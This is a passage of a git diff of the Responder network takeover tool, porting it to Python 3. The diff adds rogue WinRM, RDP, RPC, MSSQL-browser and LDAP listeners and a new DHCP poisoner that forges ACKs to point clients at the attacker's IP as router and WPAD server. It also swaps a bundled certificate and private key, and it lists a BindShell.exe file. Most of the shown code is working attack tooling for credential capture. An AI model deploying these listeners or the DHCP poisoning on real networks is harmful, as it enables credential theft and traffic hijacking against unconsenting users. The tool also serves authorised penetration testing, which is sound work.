+			server = ThreadingTCPServer((host, port), handler)
 			server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True)
 			server.serve_forever()
 		else:
@@ -175,7 +237,7 @@ def serve_thread_SSL(host, port, handler):
 			server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True)
 			server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting SSL server on port " + str(port) + ", check permissions or other servers running."
+		print(color("[!] ", 1, 1) + "Error starting SSL server on port " + str(port) + ", check permissions or other servers running.")

 def main():
 	try:
@@ -195,70 +257,97 @@ def main():

 		if settings.Config.HTTP_On_Off:
 			from servers.HTTP import HTTP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 80, HTTP,)))
+
+		if settings.Config.WinRM_On_Off:
+			from servers.WinRM import WinRM
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 5985, WinRM,)))
+
+		if settings.Config.WinRM_On_Off:
+			from servers.WinRM import WinRM
+			threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 5986, WinRM,)))

 		if settings.Config.SSL_On_Off:
-			from servers.HTTP import HTTPS
-			threads.append(Thread(target=serve_thread_SSL, args=('', 443, HTTPS,)))
+			from servers.HTTP import HTTP
+			threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 443, HTTP,)))
+
+		if settings.Config.RDP_On_Off:
+			from servers.RDP import RDP
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 3389, RDP,)))
+
+		if settings.Config.DCERPC_On_Off:
+			from servers.RPC import RPCMap, RPCMapper
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 135, RPCMap,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, settings.Config.RPCPort, RPCMapper,)))

 		if settings.Config.WPAD_On_Off:
 			from servers.HTTP_Proxy import HTTP_Proxy
-			threads.append(Thread(target=serve_thread_tcp, args=('', 3141, HTTP_Proxy,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 3141, HTTP_Proxy,)))

 		if settings.Config.ProxyAuth_On_Off:
 		        from servers.Proxy_Auth import Proxy_Auth
-		        threads.append(Thread(target=serve_thread_tcp, args=('', 3128, Proxy_Auth,)))
+		        threads.append(Thread(target=serve_thread_tcp_auth, args=(settings.Config.Bind_To, 3128, Proxy_Auth,)))

 		if settings.Config.SMB_On_Off:
 			if settings.Config.LM_On_Off:
 				from servers.SMB import SMB1LM
-				threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMB1LM,)))
-				threads.append(Thread(target=serve_thread_tcp, args=('', 139, SMB1LM,)))
+				threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 445, SMB1LM,)))
+				threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 139, SMB1LM,)))
 			else:
 				from servers.SMB import SMB1
-				threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMB1,)))
-				threads.append(Thread(target=serve_thread_tcp, args=('', 139, SMB1,)))
+				threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 445, SMB1,)))
+				threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 139, SMB1,)))

 		if settings.Config.Krb_On_Off:
 			from servers.Kerberos import KerbTCP, KerbUDP
 			threads.append(Thread(target=serve_thread_udp, args=('', 88, KerbUDP,)))
-			threads.append(Thread(target=serve_thread_tcp, args=('', 88, KerbTCP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 88, KerbTCP,)))

 		if settings.Config.SQL_On_Off:
-			from servers.MSSQL import MSSQL
-			threads.append(Thread(target=serve_thread_tcp, args=('', 1433, MSSQL,)))
+			from servers.MSSQL import MSSQL, MSSQLBrowser
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 1433, MSSQL,)))
+			threads.append(Thread(target=serve_thread_udp_broadcast, args=(settings.Config.Bind_To, 1434, MSSQLBrowser,)))

 		if settings.Config.FTP_On_Off:
 			from servers.FTP import FTP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 21, FTP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 21, FTP,)))

 		if settings.Config.POP_On_Off:
 			from servers.POP3 import POP3
-			threads.append(Thread(target=serve_thread_tcp, args=('', 110, POP3,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 110, POP3,)))

 		if settings.Config.LDAP_On_Off:
-			from servers.LDAP import LDAP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 389, LDAP,)))
+			from servers.LDAP import LDAP, CLDAP
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 389, LDAP,)))
+			threads.append(Thread(target=serve_thread_udp, args=('', 389, CLDAP,)))

 		if settings.Config.SMTP_On_Off:
 			from servers.SMTP import ESMTP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 25,  ESMTP,)))
-			threads.append(Thread(target=serve_thread_tcp, args=('', 587, ESMTP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 25,  ESMTP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 587, ESMTP,)))

 		if settings.Config.IMAP_On_Off:
 			from servers.IMAP import IMAP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 143, IMAP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 143, IMAP,)))

 		if settings.Config.DNS_On_Off:
 			from servers.DNS import DNS, DNSTCP
 			threads.append(Thread(target=serve_thread_udp, args=('', 53, DNS,)))
-			threads.append(Thread(target=serve_thread_tcp, args=('', 53, DNSTCP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 53, DNSTCP,)))

 		for thread in threads:
 			thread.setDaemon(True)
 			thread.start()

-		print color('[+]', 2, 1) + " Listening for events..."
+
+		print(color('\n[+]', 2, 1) + " Listening for events...\n")
+
+		if settings.Config.AnalyzeMode:
+			print(color('[+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1))
+
+		if settings.Config.DHCP_On_Off:
+			from poisoners.DHCP import DHCP
+			DHCP()

 		while True:
 			time.sleep(1)
--- a/certs/gen-self-signed-cert.sh
+++ b/certs/gen-self-signed-cert.sh
--- a/certs/responder.crt
+++ b/certs/responder.crt
@@ -1,18 +1,18 @@
 -----BEGIN CERTIFICATE-----
-MIIC0zCCAbugAwIBAgIJAOQijexo77F4MA0GCSqGSIb3DQEBBQUAMAAwHhcNMTUw
-NjI5MDU1MTUyWhcNMjUwNjI2MDU1MTUyWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOC
-AQ8AMIIBCgKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k
-sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP
-2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC
-6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg
-WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF
-N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABo1AwTjAdBgNVHQ4EFgQU
-YY2ttc/bjfXwGqPvNUSm6Swg4VYwHwYDVR0jBBgwFoAUYY2ttc/bjfXwGqPvNUSm
-6Swg4VYwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOCAQEAXFN+oxRwyqU0
-YWTlixZl0NP6bWJ2W+dzmlqBxugEKYJCPxM0GD+WQDEd0Au4pnhyzt77L0sBgTF8
-koFbkdFsTyX2AHGik5orYyvQqS4jVkCMudBXNLt5iHQsSXIeaOQRtv7LYZJzh335
-4431+r5MIlcxrRA2fhpOAT2ZyKW1TFkmeAMoH7/BTzGlre9AgCcnKBvvGdzJhCyw
-YlRGHrfR6HSkcoEeIV1u/fGU4RX7NO4ugD2wkOhUoGL1BS926WV02c5CugfeKUlW
-HM65lZEkTb+MQnLdpnpW8GRXhXbIrLMLd2pWW60wFhf6Ub/kGJ5bCUTnXYPRcA3v
-u0/CRCN/lg==
+MIIC4TCCAcmgAwIBAgIUO+GAjgRhHP9zb1avAb9yg8JyGOgwDQYJKoZIhvcNAQEL
+BQAwADAeFw0xOTA4MTYyMjA2MTFaFw0yOTA4MTMyMjA2MTFaMAAwggEiMA0GCSqG
+SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDVvbov/KiK+Xbv/bhGQBlgb9eVqIFDtTPd
+0ZlLNOhRuHRUbw3XC3q3gPerfSE9ANeFUKfHpSUUA5AU4hjMSBMX1iUVR+OKgzTK
+czE4kAJe1ZJpiB8TU6FBapQwOPv9M463BOQQ8lfmX+EWerT+XniMFAmxf8FS7e4/
+V7JZbon7uU18fc6H8KxVaNCEM382SpL39zU7qRNVG65Jf4MejJZEk30GMC4m22Fb
+to6f/WS1NBk4HMdLClyXZngPY0idCuCZX3KBQvYpS3e1gEBsUPV0fZBz/GnvoE4o
+qTia83QJAkjZ0r77/NAptihsXrqB2VDuR6aP5Bf/YFr/U4H9y01lAgMBAAGjUzBR
+MB0GA1UdDgQWBBTs2vL9sLFs/p78FXHfgz7Zk8ZEwTAfBgNVHSMEGDAWgBTs2vL9
+sLFs/p78FXHfgz7Zk8ZEwTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUA
+A4IBAQBIYrRgmGhAQr+VmyqSQcxYWW0GWKvGQwz5t1A8AoBe8d3SDb1mb/Lq/POx
+jnF67dAifYbTzz6JWsxCFED2UP8OL3oij0dWTfvGO//6nwhVss2Or0WTdxkSQVE4
+p4CElQYjvoYYhxuDzO3HsxqHBtxMOT+8fO/07aInxVWEtvmflNo3mxE4P7w6D8g5
+v2jZNf8EjTDQOF90kjkGGhTU7j9hRewfxzBZZOvaHA+/XczJ3fARpdYrvtFvvjnH
+Da1WjQDQhSLufZYcFrzd4i6pyXQYzevjgHSeFSJt78Hr0BxMkKzLAhsFmS6fiULm
+iKqwycWcwlFFUDbwBuOyfbfwjtUf
 -----END CERTIFICATE-----
--- a/certs/responder.key
+++ b/certs/responder.key
@@ -1,27 +1,27 @@
 -----BEGIN RSA PRIVATE KEY-----
-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
+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
 -----END RSA PRIVATE KEY-----
--- a/files/BindShell.exe
+++ b/files/BindShell.exe
--- a/fingerprint.py
+++ b/fingerprint.py
@@ -16,18 +16,24 @@
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import socket
 import struct
+import sys

-from utils import color
+from utils import color, StructPython2or3, NetworkSendBufferPython2or3, NetworkRecvBufferPython2or3
 from packets import SMBHeader, SMBNego, SMBNegoFingerData, SMBSessionFingerData

 def OsNameClientVersion(data):
 	try:
-		length = struct.unpack('<H',data[43:45])[0]
-		pack = tuple(data[47+length:].split('\x00\x00\x00'))[:2]
-		OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
-		return OsVersion, ClientVersion
+		if (sys.version_info > (3, 0)):
+			length = struct.unpack('<H',data[43:45])[0]
+			packet = NetworkRecvBufferPython2or3(data[47+length:])
+			OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in packet.split('\x00\x00\x00')[:2]])
+			return OsVersion, ClientVersion
+		else:
+			length = struct.unpack('<H',data[43:45])[0]
+			OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
+			return OsVersion, ClientVersion
 	except:
-	 	return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
+		return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"

 def RunSmbFinger(host):
 	try:
@@ -35,28 +41,26 @@ def RunSmbFinger(host):
 		s.connect(host)
 		s.settimeout(0.7)

-		h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
-		n = SMBNego(data = SMBNegoFingerData())
+		h = SMBHeader(cmd='\x72',flag1='\x18',flag2='\x53\xc8')
+		n = SMBNego(data = str(SMBNegoFingerData()))
 		n.calculate()
-		
 		Packet = str(h)+str(n)
-		Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-		s.send(Buffer)
+		Buffer1 = StructPython2or3('>i', str(Packet))+str(Packet)
+		s.send(NetworkSendBufferPython2or3(Buffer1))
 		data = s.recv(2048)
 		
-		if data[8:10] == "\x72\x00":
+		if data[8:10] == b'\x72\x00':
 			Header = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
 			Body = SMBSessionFingerData()
 			Body.calculate()

 			Packet = str(Header)+str(Body)
-			Buffer = struct.pack(">i", len(''.join(Packet)))+Packet  
-
-			s.send(Buffer) 
+			Buffer1 = StructPython2or3('>i', str(Packet))+str(Packet)
+			s.send(NetworkSendBufferPython2or3(Buffer1))
 			data = s.recv(2048)

-		if data[8:10] == "\x73\x16":
+		if data[8:10] == b'\x73\x16':
 			return OsNameClientVersion(data)
 	except:
-		print color("[!] ", 1, 1) +" Fingerprint failed"
+		print(color("[!] ", 1, 1) +" Fingerprint failed")
 		return None
--- a/logs/.gitignore
+++ b/logs/.gitignore
--- a/odict.py
+++ b/odict.py
@@ -1,20 +1,9 @@
-#!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
-# created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from UserDict import DictMixin
+import sys
+try:
+	from UserDict import DictMixin
+except ImportError:
+	from collections import UserDict
+	from collections import MutableMapping as DictMixin

 class OrderedDict(dict, DictMixin):

@@ -30,7 +19,7 @@ class OrderedDict(dict, DictMixin):
    def clear(self):
        self.__end = end = []
        end += [None, end, end]
-        self.__map = {}
+        self.__map = {} 
        dict.clear(self)

    def __setitem__(self, key, value):
@@ -77,20 +66,30 @@ class OrderedDict(dict, DictMixin):
        inst_dict = vars(self).copy()
        self.__map, self.__end = tmp
        if inst_dict:
-            return self.__class__, (items,), inst_dict
+            return (self.__class__, (items,), inst_dict)
        return self.__class__, (items,)

    def keys(self):
        return list(self)

-    setdefault = DictMixin.setdefault
-    update = DictMixin.update
-    pop = DictMixin.pop
-    values = DictMixin.values
-    items = DictMixin.items
-    iterkeys = DictMixin.iterkeys
-    itervalues = DictMixin.itervalues
-    iteritems = DictMixin.iteritems
+    if sys.version_info >= (3, 0):
+        setdefault = DictMixin.setdefault
+        update = DictMixin.update
+        pop = DictMixin.pop
+        values = DictMixin.values
+        items = DictMixin.items
+        iterkeys = DictMixin.keys
+        itervalues = DictMixin.values
+        iteritems = DictMixin.items
+    else:
+        setdefault = DictMixin.setdefault
+        update = DictMixin.update
+        pop = DictMixin.pop
+        values = DictMixin.values
+        items = DictMixin.items
+        iterkeys = DictMixin.iterkeys
+        itervalues = DictMixin.itervalues
+        iteritems = DictMixin.iteritems

    def __repr__(self):
        if not self:
@@ -115,3 +114,8 @@ class OrderedDict(dict, DictMixin):

    def __ne__(self, other):
        return not self == other
+
+
+if __name__ == '__main__':
+    d = OrderedDict([('foo',2),('bar',3),('baz',4),('zot',5),('arrgh',6)])
+    assert [x for x in d] == ['foo', 'bar', 'baz', 'zot', 'arrgh']
--- a/packets.py
+++ b/packets.py
--- a/poisoners/DHCP.py
+++ b/poisoners/DHCP.py
@@ -0,0 +1,309 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import sys
+if (sys.version_info < (3, 0)):
+   sys.exit('This script is meant to be run with Python3')
+
+import struct
+import optparse
+import configparser
+import os
+import codecs
+import netifaces
+import binascii
+
+BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
+sys.path.insert(0, BASEDIR)
+from odict import OrderedDict
+from utils import *
+
+def color(txt, code = 1, modifier = 0):
+    return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
+
+#Python version
+if (sys.version_info > (3, 0)):
+    PY2OR3     = "PY3"
+else:
+    PY2OR3  = "PY2"
+
+def StructWithLenPython2or3(endian,data):
+    #Python2...
+    if PY2OR3 == "PY2":
+        return struct.pack(endian, data)
+    #Python3...
+    else:
+        return struct.pack(endian, data).decode('latin-1')
+
+def NetworkSendBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return bytes(str(data), 'latin-1')
+
+def NetworkRecvBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return str(data.decode('latin-1'))
+
+class Packet():
+	fields = OrderedDict([
+		("data", ""),
+	])
+	def __init__(self, **kw):
+		self.fields = OrderedDict(self.__class__.fields)
+		for k,v in kw.items():
+			if callable(v):
+				self.fields[k] = v(self.fields[k])
+			else:
+				self.fields[k] = v
+	def __str__(self):
+		return "".join(map(str, self.fields.values()))
+
+config = configparser.ConfigParser()
+config.read(os.path.join(BASEDIR,'Responder.conf'))
+RespondTo           = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')] if _f]
+DontRespondTo       = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')] if _f]
+Interface           = settings.Config.Interface
+Responder_IP        = FindLocalIP(Interface, None)
+ROUTERIP            = Responder_IP # Set to Responder_IP in case we fall on a static IP network and we don't get a DHCP Offer. This var will be updated with the real dhcp IP if present.
+NETMASK             = "255.255.255.0"
+DNSIP               = "0.0.0.0"
+DNSIP2              = "0.0.0.0"
+DNSNAME             = "lan"
+WPADSRV             = "http://"+Responder_IP+"/wpad.dat"
+Respond_To_Requests = True
+DHCPClient          = []
+
+def GetMacAddress(Interface):
+	mac = netifaces.ifaddresses(Interface)[netifaces.AF_LINK][0]['addr']
+	return binascii.unhexlify(mac.replace(':', '')).decode('latin-1')
+
+##### IP Header #####
+class IPHead(Packet):
+    fields = OrderedDict([
+            ("Version",           "\x45"),
+            ("DiffServices",      "\x00"),
+            ("TotalLen",          "\x00\x00"),
+            ("Ident",             "\x00\x00"),
+            ("Flags",             "\x00\x00"),
+            ("TTL",               "\x40"),
+            ("Protocol",          "\x11"),
+            ("Checksum",          "\x00\x00"),
+            ("SrcIP",             ""),
+            ("DstIP",             ""),
+    ])
+
+class UDP(Packet):
+    fields = OrderedDict([
+            ("SrcPort",           "\x00\x43"),
+            ("DstPort",           "\x00\x44"),
+            ("Len",               "\x00\x00"),
+            ("Checksum",          "\x00\x00"),
+            ("Data",              "\x00\x00"),
+    ])
+
+    def calculate(self):
+        self.fields["Len"] = StructWithLenPython2or3(">h",len(str(self.fields["Data"]))+8)
+
+class DHCPDiscover(Packet):
+    fields = OrderedDict([
+            ("MessType",          "\x01"),
+            ("HdwType",           "\x01"),
+            ("HdwLen",            "\x06"),
+            ("Hops",              "\x00"),
+            ("Tid",               os.urandom(4).decode('latin-1')),
+            ("ElapsedSec",        "\x00\x01"),
+            ("BootpFlags",        "\x80\x00"),
+            ("ActualClientIP",    "\x00\x00\x00\x00"),
+            ("GiveClientIP",      "\x00\x00\x00\x00"),
+            ("NextServerIP",      "\x00\x00\x00\x00"),
+            ("RelayAgentIP",      "\x00\x00\x00\x00"),
+            ("ClientMac",         os.urandom(6).decode('latin-1')),#Needs to be random.
+            ("ClientMacPadding",  "\x00" *10),
+            ("ServerHostname",    "\x00" * 64),
+            ("BootFileName",      "\x00" * 128),
+            ("MagicCookie",       "\x63\x82\x53\x63"),
+            ("DHCPCode",          "\x35"),              #DHCP Message
+            ("DHCPCodeLen",       "\x01"),
+            ("DHCPOpCode",        "\x01"),              #Msgtype(Discover)
+            ("Op55",              "\x37"),
+            ("Op55Len",           "\x0b"),
+            ("Op55Str",           "\x01\x03\x0c\x0f\x06\x1a\x21\x79\x77\x2a\x78"),#Requested info.
+            ("Op12",              "\x0c"),
+            ("Op12Len",           "\x09"),
+            ("Op12Str",           settings.Config.DHCPHostname),#random str.
+            ("Op255",             "\xff"),
+            ("Padding",           "\x00"),
+    ])
+
+    def calculate(self):
+        self.fields["ClientMac"] = GetMacAddress(Interface)
+
+class DHCPACK(Packet):
+    fields = OrderedDict([
+            ("MessType",          "\x02"),
+            ("HdwType",           "\x01"),
+            ("HdwLen",            "\x06"),
+            ("Hops",              "\x00"),
+            ("Tid",               "\x11\x22\x33\x44"),
+            ("ElapsedSec",        "\x00\x00"),
+            ("BootpFlags",        "\x00\x00"),
+            ("ActualClientIP",    "\x00\x00\x00\x00"),
+            ("GiveClientIP",      "\x00\x00\x00\x00"),
+            ("NextServerIP",      "\x00\x00\x00\x00"),
+            ("RelayAgentIP",      "\x00\x00\x00\x00"),
+            ("ClientMac",         "\xff\xff\xff\xff\xff\xff"),
+            ("ClientMacPadding",  "\x00" *10),
+            ("ServerHostname",    "\x00" * 64),
+            ("BootFileName",      "\x00" * 128),
+            ("MagicCookie",       "\x63\x82\x53\x63"),
+            ("DHCPCode",          "\x35"),              #DHCP Message
+            ("DHCPCodeLen",       "\x01"),
+            ("DHCPOpCode",        "\x05"),              #Msgtype(ACK)
+            ("Op54",              "\x36"),
+            ("Op54Len",           "\x04"),
+            ("Op54Str",           ""),                  #DHCP Server
+            ("Op51",              "\x33"),
+            ("Op51Len",           "\x04"),
+            ("Op51Str",           "\x00\x00\x00\x0a"),  #Lease time
+            ("Op1",               "\x01"),
+            ("Op1Len",            "\x04"),
+            ("Op1Str",            ""),                  #Netmask
+            ("Op15",              "\x0f"),
+            ("Op15Len",           "\x0e"),
+            ("Op15Str",           ""),                  #DNS Name
+            ("Op3",               "\x03"),
+            ("Op3Len",            "\x04"),
+            ("Op3Str",            ""),                  #Router
+            ("Op6",               "\x06"),
+            ("Op6Len",            "\x08"),
+            ("Op6Str",            ""),                  #DNS Servers
+            ("Op252",             "\xfc"),
+            ("Op252Len",          "\x04"),
+            ("Op252Str",          ""),                  #Wpad Server
+            ("Op255",             "\xff"),
+            ("Padding",           "\x00"),
+    ])
+
+    def calculate(self):
+        self.fields["Op54Str"]  = socket.inet_aton(ROUTERIP).decode('latin-1')
+        self.fields["Op1Str"]   = socket.inet_aton(NETMASK).decode('latin-1')
+        self.fields["Op3Str"]   = socket.inet_aton(ROUTERIP).decode('latin-1')
